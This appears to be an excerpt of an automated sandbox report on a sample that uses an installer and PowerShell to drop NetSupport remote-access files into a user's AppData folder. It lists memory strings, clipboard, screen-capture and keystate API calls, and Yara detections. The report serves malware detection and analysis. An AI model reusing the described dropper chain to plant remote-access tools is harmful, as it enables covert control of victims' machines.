Source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.0000000005617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000581E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.00000000055F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.4.dr	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.0000000005617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000581E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.00000000055F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.4.dr	String found in binary or memory: http://s2.symcb.com0
Source: powershell.exe, 00000004.00000002.1657069390.0000000004F56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000004.00000002.1657069390.0000000004E01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.1657069390.0000000004F56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://sf.symcb.com/sf.crl0a
Source: powershell.exe, 00000004.00000002.1657069390.0000000005659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000562D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sf.symcb.com/sf.crl0f
Source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.0000000005659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000562D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sf.symcb.com/sf.crt0
Source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.0000000005659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000562D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sf.symcd.com0&
Source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.0000000005617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000581E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.00000000055F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.4.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.0000000005617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000581E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.00000000055F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.4.dr	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.0000000005617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000581E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.00000000055F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.4.dr	String found in binary or memory: http://sv.symcd.com0&
Source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000002.00000002.1786562154.0000000000FDC000.00000004.00000010.00020000.00000000.sdmp, is-MH6KB.tmp.2.dr, is-LNG1F.tmp.2.dr	String found in binary or memory: http://sw.symcb.com/sw.crl0
Source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000002.00000002.1786562154.0000000000FDC000.00000004.00000010.00020000.00000000.sdmp, is-MH6KB.tmp.2.dr, is-LNG1F.tmp.2.dr	String found in binary or memory: http://sw.symcd.com0
Source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000002.00000002.1786562154.0000000000FDC000.00000004.00000010.00020000.00000000.sdmp, is-MH6KB.tmp.2.dr, is-LNG1F.tmp.2.dr	String found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: is-LNG1F.tmp.2.dr	String found in binary or memory: http://trolltech.com/xml/features/report-start-end-entity
Source: is-LNG1F.tmp.2.dr	String found in binary or memory: http://trolltech.com/xml/features/report-whitespace-only-CharData
Source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, is-MH6KB.tmp.2.dr, is-LNG1F.tmp.2.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.0000000005659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000564F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, is-MH6KB.tmp.2.dr, is-LNG1F.tmp.2.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.0000000005659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000564F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.0000000005659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000564F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, is-MH6KB.tmp.2.dr, is-LNG1F.tmp.2.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000002.00000002.1786562154.0000000000FDC000.00000004.00000010.00020000.00000000.sdmp, is-MH6KB.tmp.2.dr, is-LNG1F.tmp.2.dr	String found in binary or memory: http://www.advanced-ip-scanner.com0
Source: powershell.exe, 00000004.00000002.1657069390.0000000004F56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.macrovision.com0
Source: client32.exe, 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.1674375162.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.1758048452.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
Source: client32.exe, 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.1674375162.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.1758048452.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
Source: powershell.exe, 00000004.00000002.1657069390.0000000005659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000562D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.dr	String found in binary or memory: http://www.netsupportsoftware.com
Source: client32.exe, 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.1674375162.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.1758048452.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.pci.co.uk/support
Source: client32.exe, 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.1674375162.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.1758048452.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.pci.co.uk/supportsupport
Source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, is-ATTN2.tmp.2.dr	String found in binary or memory: http://www.radmin.com
Source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.0000000005617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000581E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.00000000055F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.4.dr	String found in binary or memory: http://www.symauth.com/cps0(
Source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.0000000005617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000581E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.00000000055F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.4.dr	String found in binary or memory: http://www.symauth.com/rpa00
Source: KC0uZWwr8p.exe, 00000000.00000003.1789516168.0000000003111000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.uninetutility.com
Source: KC0uZWwr8p.exe, 00000000.00000003.1789516168.00000000030ED000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000002.00000003.1782320262.0000000002FED000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.uninetutility.com/support
Source: KC0uZWwr8p.tmp, 00000002.00000003.1782320262.0000000002FFC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.uninetutility.com/update
Source: KC0uZWwr8p.exe, 00000000.00000003.1789516168.00000000030FC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.uninetutility.com/update)
Source: KC0uZWwr8p.tmp, 00000002.00000003.1782320262.0000000003011000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.uninetutility.comQV
Source: is-LNG1F.tmp.2.dr	String found in binary or memory: http://xml.org/sax/features/namespace-prefixes
Source: is-LNG1F.tmp.2.dr	String found in binary or memory: http://xml.org/sax/features/namespaces
Source: is-LNG1F.tmp.2.dr	String found in binary or memory: http://xml.org/sax/features/namespaceshttp://xml.org/sax/features/namespace-prefixeshttp://trolltech
Source: powershell.exe, 00000004.00000002.1657069390.0000000004E01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000004.00000002.1675819227.0000000006868000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.1675819227.0000000006868000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.1675819227.0000000006868000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000002.00000002.1786562154.0000000000FDC000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.0000000005617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.0000000005659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000562D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000581E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.00000000055F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp, is-MH6KB.tmp.2.dr, PCICHEK.DLL.4.dr, is-LNG1F.tmp.2.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: is-LNG1F.tmp.2.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000002.00000002.1786562154.0000000000FDC000.00000004.00000010.00020000.00000000.sdmp, is-MH6KB.tmp.2.dr, is-LNG1F.tmp.2.dr	String found in binary or memory: https://d.symcb.com/rpa0)
Source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, is-MH6KB.tmp.2.dr, is-LNG1F.tmp.2.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: powershell.exe, 00000004.00000002.1657069390.0000000004F56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: KC0uZWwr8p.exe	String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: powershell.exe, 00000004.00000002.1675819227.0000000006868000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.1657069390.0000000005659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: powershell.exe, 00000004.00000002.1657069390.0000000005659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0D
Source: KC0uZWwr8p.exe, 00000000.00000003.1293120278.000000007EF3B000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.exe, 00000000.00000003.1292506681.00000000035A0000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000002.00000000.1295073878.0000000000B21000.00000020.00000001.01000000.00000004.sdmp	String found in binary or memory: https://www.innosetup.com/
Source: KC0uZWwr8p.exe, 00000000.00000003.1293120278.000000007EF3B000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.exe, 00000000.00000003.1292506681.00000000035A0000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000002.00000000.1295073878.0000000000B21000.00000020.00000001.01000000.00000004.sdmp	String found in binary or memory: https://www.remobjects.com/ps

Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

Code function: 6_2_1101F360 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,

6_2_1101F360

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_1101F360 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,	6_2_1101F360
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_11032930 GetClipboardFormatNameA,SetClipboardData,	6_2_11032930
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_1101F360 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,	8_2_1101F360
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_11032930 GetClipboardFormatNameA,SetClipboardData,	8_2_11032930

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

Code function: 6_2_11031AC0 IsClipboardFormatAvailable,GetClipboardData,GlobalSize,GlobalLock,_memmove,GlobalUnlock,

6_2_11031AC0

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

Code function: 6_2_11007720 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,

6_2_11007720

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_11110810 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,		6_2_11110810
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_11110810 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,		8_2_11110810

Source: Yara match	File source: 6.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1674299523.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1758015972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: client32.exe PID: 6588, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 564, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 2636, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SystemUtil\PCICL32.DLL, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_11112840 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,		6_2_11112840
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_11112840 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,		8_2_11112840

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi32_7320.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7320, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SystemUtil\pcicapi.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SystemUtil\msvcr100.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SystemUtil\PCICHEK.DLL	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SystemUtil\TCCTL32.DLL	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SystemUtil\PCICL32.DLL	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SystemUtil\remcmdstub.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SystemUtil\AudioCapture.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SystemUtil\HTCTL32.DLL	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

Code function: 6_2_110A9240: DeviceIoControl,

6_2_110A9240

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

Code function: 6_2_1115A340 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,

6_2_1115A340

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,		6_2_1102CE2D
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,		8_2_1102CE2D

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_079A5BF0	4_2_079A5BF0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_11029230	6_2_11029230
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_11072460	6_2_11072460
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_1115B180	6_2_1115B180
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_1105B3B0	6_2_1105B3B0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_1106F210	6_2_1106F210
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_1107F520	6_2_1107F520
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_1101B980	6_2_1101B980
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_1115F9F0	6_2_1115F9F0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_1101BDC0	6_2_1101BDC0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_11163C55	6_2_11163C55
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_1108A260	6_2_1108A260
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_11050430	6_2_11050430
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_110088DB	6_2_110088DB
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_1101CBE0	6_2_1101CBE0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_11032A60	6_2_11032A60
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_11086DA0	6_2_11086DA0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_11044C60	6_2_11044C60
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_68C6A980	6_2_68C6A980
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_68C94910	6_2_68C94910
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_68C93923	6_2_68C93923
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_68C6DBA0	6_2_68C6DBA0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_68C93DB8	6_2_68C93DB8
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_68C9A063	6_2_68C9A063
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_68C94156	6_2_68C94156
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_1115B180	8_2_1115B180
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_1105B3B0	8_2_1105B3B0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_11029230	8_2_11029230
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_1107F520	8_2_1107F520
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_1101B980	8_2_1101B980
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_1115F9F0	8_2_1115F9F0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_1101BDC0	8_2_1101BDC0
